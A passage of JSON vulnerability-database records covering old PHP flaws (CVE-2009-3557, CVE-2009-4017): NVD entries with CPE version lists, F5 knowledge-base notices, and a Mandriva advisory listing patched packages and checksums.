"cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:22", "description": "The tempnam function in ext/standard/file.c in PHP before 5.2.12 and 5.3.x before 5.3.1 allows context-dependent attackers to bypass safe_mode restrictions, and create files in group-writable or world-writable directories, via the dir and prefix arguments.", "edition": 5, "cvss3": {}, "published": "2009-11-23T17:30:00", "title": "CVE-2009-3557", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3557"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2009-3557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3557", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-10-12T02:11:20", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "Prior to PHP 5.2.12, and in the 5.3.x branch prior to 5.3.1, the scripting language does not restrict the number of temporary files created when handling a multipart/form-data POST request, which allows remote attackers to cause a denial-of-service (resource exhaustion), and makes it easier for remote attackers to exploit local file inclusion vulnerabilities, through multiple requests, related to lack of support for the **max_file_uploads** directive.\n\nImpact\n\nDenial-of-service (resource exhaustion of inodes and disk space).\n\nNone\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017>\n\n**Note**: This link will take you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n", "modified": "2016-01-09T02:25:00", "published": "2012-01-13T23:48:00", "id": "F5:K13279", "href": "https://support.f5.com/csp/article/K13279", "title": "PHP vulnerability CVE-2009-4017", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017>\n\n**Note**: This link will take you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL167: Downloading software and firmware from F5\n * SOL10322: FirePass hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n", "modified": "2013-09-11T00:00:00", "published": "2012-01-13T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/200/sol13279.html", "id": "SOL13279", "title": "SOL13279 - PHP vulnerability CVE-2009-4017", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-06-08T02:18:12", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "\nF5 Product Development has assigned ID 383337 (FirePass) to this vulnerability. To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct| Versions known \nto be vulnerable| Versions known \nto be not vulnerable| Vulnerable component \nor feature \n---|---|---|--- \nBIG-IP LTM| None| 9.x \n10.x \n11.x| None \nBIG-IP GTM| None| 9.x \n10.x \n11.x| None \nBIG-IP ASM| None| 9.x \n10.x \n11.x| None \nBIG-IP Link Controller| None| 9.x \n10.x \n11.x| None \nBIG-IP WebAccelerator| None| 9.x \n10.x \n11.x| None \nBIG-IP PSM| None| 9.x \n10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nBIG-IP AAM| None| 11.x| None \nFirePass| 6.0.0 - 6.1.0 \n7.0.0| 6.1.0 HF-610-9 \n7.0.0 HF-70-7| Active user sessions \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 4.x \n5.x \n6.x| None\n\nUpgrade FirePass to the latest hotfix.\n\nF5 would like to acknowledge Aung Khant of YGN Ethical Hacker Group, Myanmar for bringing this issue to our attention, and for following the highest standards of responsible disclosure.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n", "modified": "2017-03-14T22:15:00", "published": "2012-11-03T02:18:00", "href": "https://support.f5.com/csp/article/K13993", "id": "F5:K13993", "type": "f5", "title": "Cross-site URL redirection attack vulnerability CVE-2009-4017", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:00", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nUpgrade FirePass to the latest hotfix.\n\nAcknowledgements\n\nF5 would like to acknowledge Aung Khant of YGN Ethical Hacker Group, Myanmar for bringing this issue to our attention, and for following the highest standards of responsible disclosure.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL167: Downloading software and firmware from F5\n * SOL10322: FirePass hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n", "modified": "2016-07-25T00:00:00", "published": "2012-11-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/900/sol13993.html", "id": "SOL13993", "title": "SOL13993 - Cross-site URL redirection attack vulnerability CVE-2009-4017", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-3292", "CVE-2009-3559", "CVE-2009-3557"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:302\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : November 21, 2009\r\n Affected: 2010.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Some vulnerabilities were discovered and corrected in php-5.3.1:\r\n \r\n - Added max_file_uploads INI directive, which can be set to limit\r\n the number of file uploads per-request to 20 by default, to prevent\r\n possible DOS via temporary file exhaustion. &#40;Ilia&#41;\r\n - Added missing sanity checks around exif processing. &#40;CVE-2009-3292,\r\n Ilia&#41;\r\n - Fixed a safe_mode bypass in tempnam&#40;&#41; identified by Grzegorz\r\n Stachowiak. &#40;CVE-2009-3557, Rasmus&#41;\r\n - Fixed a open_basedir bypass in posix_mkfifo&#40;&#41; identified by Grzegorz\r\n Stachowiak. &#40;CVE-2009-3558, Rasmus&#41;\r\n - Fixed bug #50063 &#40;safe_mode_include_dir fails&#41;. &#40;CVE-2009-3559,\r\n Johannes, christian at elmerot dot se&#41;\r\n \r\n Additionally, some packages which require so, have been rebuilt and\r\n are being provided as updates.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3559\r\n http://news.php.net/php.announce/79\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2010.0:\r\n 9a9a6d3592442a9cc6156053a7e10240 2010.0/i586/apache-mod_php-5.3.1-0.1mdv2010.0.i586.rpm\r\n c2929f3d9e4f6f9ffbdcf0298f49e9d5 2010.0/i586/libphp5_common5-5.3.1-0.1mdv2010.0.i586.rpm\r\n 10a871efe5372d767e695015e6162a35 2010.0/i586/php-apc-3.1.3p1-2.2mdv2010.0.i586.rpm\r\n aeefd555c02ba93d7a0673261d09cefa 2010.0/i586/php-apc-admin-3.1.3p1-2.2mdv2010.0.i586.rpm\r\n dd36730ceca7bcbd75d1cc265e57796c 2010.0/i586/php-bcmath-5.3.1-0.1mdv2010.0.i586.rpm\r\n 842085f294b53fea237c7fd4b4a4a731 2010.0/i586/php-bz2-5.3.1-0.1mdv2010.0.i586.rpm\r\n 210b51fb4fc1bc7382270b5dfe4c1292 2010.0/i586/php-calendar-5.3.1-0.1mdv2010.0.i586.rpm\r\n e3af3bc4e93128e2a0c61134d92f2e4d 2010.0/i586/php-cgi-5.3.1-0.1mdv2010.0.i586.rpm\r\n 3bf827beaf5e9f94413422921a54593b 2010.0/i586/php-cli-5.3.1-0.1mdv2010.0.i586.rpm\r\n caca8d01571db25e63934d87fd402bd4 2010.0/i586/php-ctype-5.3.1-0.1mdv2010.0.i586.rpm\r\n a6d80cf64701a05e16585fc501b5b540 2010.0/i586/php-curl-5.3.1-0.1mdv2010.0.i586.rpm\r\n 1ea55c039c6aa701ce7bdab8f23a4809 2010.0/i586/php-dba-5.3.1-0.1mdv2010.0.i586.rpm\r\n b5a25648e7de6a4ae46c5987732ae5c2 2010.0/i586/php-devel-5.3.1-0.1mdv2010.0.i586.rpm\r\n 18244fe0bc0d2c974bffbde442139d4d 2010.0/i586/php-doc-5.3.1-0.1mdv2010.0.i586.rpm\r\n 86da36240233930dd45944fc5751aea2 2010.0/i586/php-dom-5.3.1-0.1mdv2010.0.i586.rpm\r\n 4809b8e1dccb376b29e63d2d9e0553c8 2010.0/i586/php-eaccelerator-0.9.6-0.358.4.2mdv2010.0.i586.rpm\r\n 888f1faf4e03f8b131ae3fa6d1b6df00 2010.0/i586/php-eaccelerator-admin-0.9.6-0.358.4.2mdv2010.0.i586.rpm\r\n 98e2c5ff3b2b0bd5a3a324d75943bc68 2010.0/i586/php-enchant-5.3.1-0.1mdv2010.0.i586.rpm\r\n ebeba3403d3cfb154fd3519d1ba1f87b 2010.0/i586/php-exif-5.3.1-0.1mdv2010.0.i586.rpm\r\n b8032a3c9bab1ee6d92766a9d91a94b3 2010.0/i586/php-fileinfo-5.3.1-0.1mdv2010.0.i586.rpm\r\n 5e065f9caafb239e95d0599b05d8b583 2010.0/i586/php-filter-5.3.1-0.1mdv2010.0.i586.rpm\r\n a684ffbdca2ab3e97a042c64893ee031 2010.0/i586/php-ftp-5.3.1-0.1mdv2010.0.i586.rpm\r\n 77218195ea8f4c21ae5d09355f8a5ee6 2010.0/i586/php-gd-5.3.1-0.1mdv2010.0.i586.rpm\r\n a6b68a36aec61fe1eae6133cd3ccbc90 2010.0/i586/php-gettext-5.3.1-0.1mdv2010.0.i586.rpm\r\n 3a1baea2efe7dc9150f5225183623ade 2010.0/i586/php-gmp-5.3.1-0.1mdv2010.0.i586.rpm\r\n cc54a9975fef390fc2334dba517c74d7 2010.0/i586/php-hash-5.3.1-0.1mdv2010.0.i586.rpm\r\n fbf023013b020e021484b791e7d2f37e 2010.0/i586/php-iconv-5.3.1-0.1mdv2010.0.i586.rpm\r\n 9f21c625c471d60f4f7548337af57e8f 2010.0/i586/php-imap-5.3.1-0.1mdv2010.0.i586.rpm\r\n a0580ae15ead9e22722bbbc0bfecdab4 2010.0/i586/php-intl-5.3.1-0.1mdv2010.0.i586.rpm\r\n 414f2c8a216355151a53c9e65b61672b 2010.0/i586/php-json-5.3.1-0.1mdv2010.0.i586.rpm\r\n 753a519f72a54da833b92fceec144ed1 2010.0/i586/php-ldap-5.3.1-0.1mdv2010.0.i586.rpm\r\n 548fe770100cdaee430d9b623a55d096 2010.0/i586/php-mbstring-5.3.1-0.1mdv2010.0.i586.rpm\r\n 14aeafa4c3dc9328f7d3c86da329ee83 2010.0/i586/php-mcrypt-5.3.1-0.1mdv2010.0.i586.rpm\r\n ad13d62a841d3826186016c76f23b56f 2010.0/i586/php-mssql-5.3.1-0.1mdv2010.0.i586.rpm\r\n 7fb2e63494ecab50f5f9759cf6949f31 2010.0/i586/php-mysql-5.3.1-0.1mdv2010.0.i586.rpm\r\n 549bb95290499a6fcbebfe6abe05105a 2010.0/i586/php-mysqli-5.3.1-0.1mdv2010.0.i586.rpm\r\n 7c8323fd8a56653d81061e196e8e518f 2010.0/i586/php-odbc-5.3.1-0.1mdv2010.0.i586.rpm\r\n a740f8c87363db809cd909dee0f4fb4b 2010.0/i586/php-openssl-5.3.1-0.1mdv2010.0.i586.rpm\r\n 39cc4f6182e0995c59c6ed98a394fbeb 2010.0/i586/php-pcntl-5.3.1-0.1mdv2010.0.i586.rpm\r\n f56d6cb5f45698abc99f115fdaf7e216 2010.0/i586/php-pdo-5.3.1-0.1mdv2010.0.i586.rpm\r\n 988b631048bb37c53b87296ba3a2917d 2010.0/i586/php-pdo_dblib-5.3.1-0.1mdv2010.0.i586.rpm\r\n 3a563b0fab748c8e3879ed7f8cdb490f 2010.0/i586/php-pdo_mysql-5.3.1-0.1mdv2010.0.i586.rpm\r\n ff615466f3280e4ad692a7ae3475c6e0 2010.0/i586/php-pdo_odbc-5.3.1-0.1mdv2010.0.i586.rpm\r\n 62676823cc4c8e1f1544c3783204f4bb 2010.0/i586/php-pdo_pgsql-5.3.1-0.1mdv2010.0.i586.rpm\r\n bedcc77f60e6074f2060718cba3e8dc9 2010.0/i586/php-pdo_sqlite-5.3.1-0.1mdv2010.0.i586.rpm\r\n 64c1fccd42dd05002f5184c40cfbc659 2010.0/i586/php-pgsql-5.3.1-0.1mdv2010.0.i586.rpm\r\n 9142be318f94284d2ded384cea6f597e 2010.0/i586/php-posix-5.3.1-0.1mdv2010.0.i586.rpm\r\n cb7fe22c4e97b94f0172b179e8fd0df5 2010.0/i586/php-pspell-5.3.1-0.1mdv2010.0.i586.rpm\r\n d420e68ab571e279d99cefc4645a91d2 2010.0/i586/php-readline-5.3.1-0.1mdv2010.0.i586.rpm\r\n c671f7ac343e230001d4a1dfb5f5ad08 2010.0/i586/php-recode-5.3.1-0.1mdv2010.0.i586.rpm\r\n fdf9c2c26dea59b7eeca43bfd8d9d6db 2010.0/i586/php-session-5.3.1-0.1mdv2010.0.i586.rpm\r\n e36e8637bf25f9b830755913aecf4eea 2010.0/i586/php-shmop-5.3.1-0.1mdv2010.0.i586.rpm\r\n 4efdedb19a9367607d06f02a7b4761db 2010.0/i586/php-snmp-5.3.1-0.1mdv2010.0.i586.rpm\r\n 5d3c726aea80f53dbc15dba5da4bbc3f 2010.0/i586/php-soap-5.3.1-0.1mdv2010.0.i586.rpm\r\n f08ec4a63bc858d5e9031787ce9cf1a5 2010.0/i586/php-sockets-5.3.1-0.1mdv2010.0.i586.rpm\r\n 06390314b932f7855308a62ddcb38eba 2010.0/i586/php-sqlite3-5.3.1-0.1mdv2010.0.i586.rpm\r\n 5f21547931e8f4082eac75d08e07a6f2 2010.0/i586/php-suhosin-0.9.29-2.2mdv2010.0.i586.rpm\r\n 969522b615e5a933f9ce1e9173b6c13f 2010.0/i586/php-sybase_ct-5.3.1-0.1mdv2010.0.i586.rpm\r\n 4d6c459c97c96e13de0b0879c5b4865d 2010.0/i586/php-sysvmsg-5.3.1-0.1mdv2010.0.i586.rpm\r\n 1c295571ef8c01cd15253f9165f1f556 2010.0/i586/php-sysvsem-5.3.1-0.1mdv2010.0.i586.rpm\r\n d4a8fda07853535cdc5007c910404a45 2010.0/i586/php-sysvshm-5.3.1-0.1mdv2010.0.i586.rpm\r\n 96a62ab7315a59938d157948bacd2780 2010.0/i586/php-tidy-5.3.1-0.1mdv2010.0.i586.rpm\r\n fbeea89fc593fd94ad6b5cb7f78c1b58 2010.0/i586/php-tokenizer-5.3.1-0.1mdv2010.0.i586.rpm\r\n 2caf4287b11b13453bea74225f530bb8 2010.0/i586/php-wddx-5.3.1-0.1mdv2010.0.i586.rpm\r\n f29d6af1eafbccc4e9dd2359d793eb3b 2010.0/i586/php-xml-5.3.1-0.1mdv2010.0.i586.rpm\r\n 6d3464dae2068065da7ff321f2d58f1a 2010.0/i586/php-xmlreader-5.3.1-0.1mdv2010.0.i586.rpm\r\n a52ffeebba0f8e946a714dd891b92fa6 2010.0/i586/php-xmlrpc-5.3.1-0.1mdv2010.0.i586.rpm\r\n 6dd12846bf833846e5b74e92088eb293 2010.0/i586/php-xmlwriter-5.3.1-0.1mdv2010.0.i586.rpm\r\n cb2c46c2a56738036035f82dcc3a58d8 2010.0/i586/php-xsl-5.3.1-0.1mdv2010.0.i586.rpm\r\n c6cc598aa8e67bd86978485c0b50ccdd 2010.0/i586/php-zip-5.3.1-0.1mdv2010.0.i586.rpm\r\n 6bebd32c74931303b4c0c035389e8855 2010.0/i586/php-zlib-5.3.1-0.1mdv2010.0.i586.rpm \r\n a202eb53819509b7395cb0b4ba4ae6cf 2010.0/SRPMS/apache-mod_php-5.3.1-0.1mdv2010.0.src.rpm\r\n 52e2ab547cf80d5feec71ea867c7e8dd 2010.0/SRPMS/php-5.3.1-0.1mdv2010.0.src.rpm\r\n dd09b21ab4d24b9e3b0a64e7da5d8a7a 2010.0/SRPMS/php-apc-3.1.3p1-2.2mdv2010.0.src.rpm\r\n 69578a9daaa312128cbec0dcba61d923 2010.0/SRPMS/php-eaccelerator-0.9.6-0.358.4.2mdv2010.0.src.rpm\r\n 6711727b246c38a02d8404e0d9e151f6 2010.0/SRPMS/php-suhosin-0.9.29-2.2mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n af925f045264bd859dfde35c960e934e 2010.0/x86_64/apache-mod_php-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n ed57ed5d9556e025b203bd9c106ac075 2010.0/x86_64/lib64php5_common5-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 2c7543ee2a7279a8fb0a78eb91b4870f 2010.0/x86_64/php-apc-3.1.3p1-2.2mdv2010.0.x86_64.rpm\r\n 9410946e6d87d3cdcddeaa7c45970116 2010.0/x86_64/php-apc-admin-3.1.3p1-2.2mdv2010.0.x86_64.rpm\r\n f2aff3fd00e84afe1ad8efee09b2a469 2010.0/x86_64/php-bcmath-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 88ea5ac44abcc05598dc21cfbce8e3b5 2010.0/x86_64/php-bz2-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 662b8c3a4ea0515ab34573c1923d2ead 2010.0/x86_64/php-calendar-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 4addbdce7a6605c9dacf448f86d05eb8 2010.0/x86_64/php-cgi-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n e74beef1ad568b3aafa3547d37e65cee 2010.0/x86_64/php-cli-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n e08d5c29f54a708960e0a952daef3b04 2010.0/x86_64/php-ctype-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 570a48786390ef0a9e94649c073c2981 2010.0/x86_64/php-curl-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n c3e3ae5cb74b7143984ed8ae94449f09 2010.0/x86_64/php-dba-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n b131b9162844e8595f493a81808a1925 2010.0/x86_64/php-devel-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 8f044f00302c1ea88223e246100a43b9 2010.0/x86_64/php-doc-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n a76e37662c725fcd1475b3b6293a441b 